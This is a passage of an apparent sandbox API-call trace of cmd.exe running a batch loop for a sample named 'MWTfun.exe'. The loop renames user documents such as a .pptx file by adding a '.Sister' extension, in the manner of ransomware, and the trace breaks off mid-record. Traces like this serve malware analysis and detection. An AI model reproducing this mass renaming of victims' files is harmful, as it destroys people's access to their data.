0x50 [0304.696] GetFileType (hFile=0x50) returned 0x2 [0304.696] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.696] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0304.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.697] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0304.697] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0304.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.697] GetFileType (hFile=0x50) returned 0x2 [0304.697] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.697] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.698] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0304.698] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0304.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.698] GetFileType (hFile=0x50) returned 0x2 [0304.698] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.698] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.699] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0304.699] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0304.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.699] GetFileType (hFile=0x50) returned 0x2 [0304.699] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.699] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.700] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0304.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.706] GetFileType (hFile=0x50) returned 0x2 [0304.706] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.706] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0304.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.706] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d29fe0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d29fe0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0304.707] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"m-Z5Dsoldvd.pptx.Sister\" \"m-Z5Dsoldvd.bat\" ") returned 45 [0304.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.707] GetFileType (hFile=0x50) returned 0x2 [0304.707] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.707] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.707] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2d, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x2d) returned 1 [0304.708] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0304.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.708] GetFileType (hFile=0x50) returned 0x2 [0304.708] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.708] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0304.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.708] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0304.713] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0304.713] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0304.715] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0304.715] malloc (_Size=0xffce) returned 0x21eda1dfe40 [0304.715] ??_V@YAXPEAX@Z () returned 0x21eda1dfe40 [0304.715] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0304.715] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0304.715] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0304.715] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0304.715] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0304.715] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0304.715] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0304.715] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0304.715] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0304.715] ??_V@YAXPEAX@Z () returned 0x1 [0304.715] GetProcessHeap () returned 0x21ed8c70000 [0304.715] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xc8) returned 0x21ed8d6a2e0 [0304.716] GetProcessHeap () returned 0x21ed8c70000 [0304.716] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6a2e0, Size=0x6c) returned 0x21ed8d67830 [0304.716] GetProcessHeap () returned 0x21ed8c70000 [0304.716] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d67830) returned 0x6c [0304.716] GetProcessHeap () returned 0x21ed8c70000 [0304.716] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d67230 [0304.716] GetProcessHeap () returned 0x21ed8c70000 [0304.716] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xc8) returned 0x21ed8d69fa0 [0304.716] GetProcessHeap () returned 0x21ed8c70000 [0304.716] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d69fa0, Size=0x6c) returned 0x21ed8d67930 [0304.716] GetProcessHeap () returned 0x21ed8c70000 [0304.716] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d67930) returned 0x6c [0304.716] malloc (_Size=0xffce) returned 0x21eda1dfe40 [0304.716] ??_V@YAXPEAX@Z () returned 0x21eda1dfe40 [0304.716] GetProcessHeap () returned 0x21ed8c70000 [0304.716] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7480 [0304.716] GetProcessHeap () returned 0x21ed8c70000 [0304.716] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5bd80 [0304.716] _wcsicmp (_String1="m-Z5Dsoldvd.pptx", _String2=".") returned 63 [0304.716] _wcsicmp (_String1="m-Z5Dsoldvd.pptx", _String2="..") returned 63 [0304.717] GetFileAttributesW (lpFileName="m-Z5Dsoldvd.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\m-z5dsoldvd.pptx")) returned 0x20 [0304.717] GetProcessHeap () returned 0x21ed8c70000 [0304.717] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed92b0050 [0304.718] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed92b0060 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0304.718] SetErrorMode (uMode=0x0) returned 0x0 [0304.718] SetErrorMode (uMode=0x1) returned 0x0 [0304.718] GetFullPathNameW (in: lpFileName="m-Z5Dsoldvd.pptx", nBufferLength=0x7fe7, lpBuffer=0x21eda1dfe40, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\m-Z5Dsoldvd.pptx", lpFilePart=0xa6cf4fd660*="m-Z5Dsoldvd.pptx") returned 0x2a [0304.718] SetErrorMode (uMode=0x0) returned 0x1 [0304.718] GetProcessHeap () returned 0x21ed8c70000 [0304.718] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5bb10 [0304.718] _wcsicmp (_String1="m-Z5Dsoldvd.pptx", _String2=".") returned 63 [0304.718] _wcsicmp (_String1="m-Z5Dsoldvd.pptx", _String2="..") returned 63 [0304.718] GetFileAttributesW (lpFileName="m-Z5Dsoldvd.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\m-z5dsoldvd.pptx")) returned 0x20 [0304.718] ??_V@YAXPEAX@Z () returned 0x1 [0304.718] malloc (_Size=0xffce) returned 0x21eda1dfe40 [0304.719] ??_V@YAXPEAX@Z () returned 0x21eda1dfe40 [0304.719] malloc (_Size=0xffce) returned 0x21eda1efe20 [0304.719] ??_V@YAXPEAX@Z () returned 0x21eda1efe20 [0304.719] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\m-Z5Dsoldvd.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\m-z5dsoldvd.pptx")) returned 0x20 [0304.719] malloc (_Size=0xffce) returned 0x21ed993f900 [0304.719] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0304.719] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\m-Z5Dsoldvd.pptx", fInfoLevelId=0x1, lpFindFileData=0x21ed8d5bd90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8d5bd90) returned 0x21ed8cc7780 [0304.720] malloc (_Size=0xffce) returned 0x21ed994f8e0 [0304.720] ??_V@YAXPEAX@Z () returned 0x21ed994f8e0 [0304.720] ??_V@YAXPEAX@Z () returned 0x1 [0304.720] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\m-Z5Dsoldvd.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\m-z5dsoldvd.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\m-Z5Dsoldvd.pptx.Sister" (normalized: "c:\\users\\fd1hvy\\documents\\m-z5dsoldvd.pptx.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0304.720] FindNextFileW (in: hFindFile=0x21ed8cc7780, lpFindFileData=0x21ed8d5bd90 | out: lpFindFileData=0x21ed8d5bd90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef9ff870, ftCreationTime.dwHighDateTime=0x1d5a413, ftLastAccessTime.dwLowDateTime=0xf8e32f80, ftLastAccessTime.dwHighDateTime=0x1d59f0c, ftLastWriteTime.dwLowDateTime=0xf8e32f80, ftLastWriteTime.dwHighDateTime=0x1d59f0c, nFileSizeHigh=0x0, nFileSizeLow=0x7df8, dwReserved0=0x0, dwReserved1=0x0, cFileName="m-Z5Dsoldvd.pptx", cAlternateFileName="")) returned 0 [0304.721] GetLastError () returned 0x12 [0304.721] FindClose (in: hFindFile=0x21ed8cc7780 | out: hFindFile=0x21ed8cc7780) returned 1 [0304.722] ??_V@YAXPEAX@Z () returned 0x1 [0304.722] ??_V@YAXPEAX@Z () returned 0x1 [0304.722] ??_V@YAXPEAX@Z () returned 0x1 [0304.722] ??_V@YAXPEAX@Z () returned 0x1 [0304.722] GetProcessHeap () returned 0x21ed8c70000 [0304.722] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7cc0 [0304.722] GetProcessHeap () returned 0x21ed8c70000 [0304.722] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95500, Size=0x16) returned 0x21ed8c95820 [0304.722] GetProcessHeap () returned 0x21ed8c70000 [0304.722] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95820) returned 0x16 [0304.722] GetProcessHeap () returned 0x21ed8c70000 [0304.722] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45d10, Size=0x20) returned 0x21ed8d45cb0 [0304.722] GetProcessHeap () returned 0x21ed8c70000 [0304.722] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45cb0) returned 0x20 [0304.722] GetProcessHeap () returned 0x21ed8c70000 [0304.722] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d61a80 [0304.722] GetProcessHeap () returned 0x21ed8c70000 [0304.722] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d61a80, Size=0xb2) returned 0x21ed93b5d30 [0304.722] GetProcessHeap () returned 0x21ed8c70000 [0304.722] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b5d30) returned 0xb2 [0304.722] GetProcessHeap () returned 0x21ed8c70000 [0304.723] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2a1a0 [0304.723] GetProcessHeap () returned 0x21ed8c70000 [0304.723] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2a1a0, Size=0x30) returned 0x21ed8d2a1a0 [0304.723] GetProcessHeap () returned 0x21ed8c70000 [0304.723] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2a1a0) returned 0x30 [0304.723] GetProcessHeap () returned 0x21ed8c70000 [0304.723] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2a1e0 [0304.723] malloc (_Size=0x1ff9c) returned 0x21eda1dfe40 [0304.724] GetProcessHeap () returned 0x21ed8c70000 [0304.724] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed93b57f0 [0304.724] GetProcessHeap () returned 0x21ed8c70000 [0304.724] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed93b58b0 [0304.724] ??_V@YAXPEAX@Z () returned 0x1 [0304.724] malloc (_Size=0x1ff9c) returned 0x21eda1dfe40 [0304.724] GetProcessHeap () returned 0x21ed8c70000 [0304.724] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed93b4e30 [0304.724] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21eda1dfe40, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0304.724] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc7720 [0304.724] FindClose (in: hFindFile=0x21ed8cc7720 | out: hFindFile=0x21ed8cc7720) returned 1 [0304.725] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc7600 [0304.725] FindClose (in: hFindFile=0x21ed8cc7600 | out: hFindFile=0x21ed8cc7600) returned 1 [0304.725] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8cc72a0 [0304.725] FindClose (in: hFindFile=0x21ed8cc72a0 | out: hFindFile=0x21ed8cc72a0) returned 1 [0304.725] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0304.726] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0304.726] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0304.726] GetProcessHeap () returned 0x21ed8c70000 [0304.726] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d674b0 [0304.726] ??_V@YAXPEAX@Z () returned 0x1 [0304.726] ??_V@YAXPEAX@Z () returned 0x1 [0304.726] GetProcessHeap () returned 0x21ed8c70000 [0304.726] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2a1e0, Size=0x490) returned 0x21ed8d2a1e0 [0304.726] GetProcessHeap () returned 0x21ed8c70000 [0304.726] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2a1e0) returned 0x490 [0304.726] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0304.726] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.726] GetFileType (hFile=0x50) returned 0x2 [0304.726] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.726] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0304.729] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.729] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0304.736] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0304.736] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0304.736] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0304.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.736] GetFileType (hFile=0x50) returned 0x2 [0304.736] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.736] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0304.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.737] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x1a) returned 1 [0304.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.737] GetFileType (hFile=0x50) returned 0x2 [0304.737] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.737] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0304.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.738] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d2a1b0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d2a1b0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0304.738] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0304.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.738] GetFileType (hFile=0x50) returned 0x2 [0304.738] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.738] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0304.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.739] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0304.746] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0304.746] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.746] GetFileType (hFile=0x50) returned 0x2 [0304.746] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.746] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0304.746] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.747] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0304.752] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0304.752] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0304.753] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0304.753] malloc (_Size=0xffce) returned 0x21eda1dfe40 [0304.753] ??_V@YAXPEAX@Z () returned 0x21eda1dfe40 [0304.753] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0304.753] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0304.753] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0304.753] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0304.753] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0304.753] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0304.753] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0304.753] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0304.753] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0304.753] ??_V@YAXPEAX@Z () returned 0x1 [0304.753] GetProcessHeap () returned 0x21ed8c70000 [0304.753] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5f720 [0304.753] GetProcessHeap () returned 0x21ed8c70000 [0304.753] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5f720, Size=0x130) returned 0x21ed93b25b0 [0304.753] GetProcessHeap () returned 0x21ed8c70000 [0304.753] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b25b0) returned 0x130 [0304.756] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0304.756] malloc (_Size=0xffce) returned 0x21eda1dfe40 [0304.756] ??_V@YAXPEAX@Z () returned 0x21eda1dfe40 [0304.756] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0304.756] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21eda1dfe40, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0304.757] ??_V@YAXPEAX@Z () returned 0x1 [0304.758] GetProcessHeap () returned 0x21ed8c70000 [0304.758] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed93b26f0 [0304.758] GetProcessHeap () returned 0x21ed8c70000 [0304.758] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5e420 [0304.758] GetProcessHeap () returned 0x21ed8c70000 [0304.758] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5e420, Size=0x130) returned 0x21ed93b2830 [0304.758] GetProcessHeap () returned 0x21ed8c70000 [0304.758] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b2830) returned 0x130 [0304.758] malloc (_Size=0xffce) returned 0x21eda1dfe40 [0304.758] ??_V@YAXPEAX@Z () returned 0x21eda1dfe40 [0304.758] GetProcessHeap () returned 0x21ed8c70000 [0304.758] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc78a0 [0304.758] GetProcessHeap () returned 0x21ed8c70000 [0304.758] 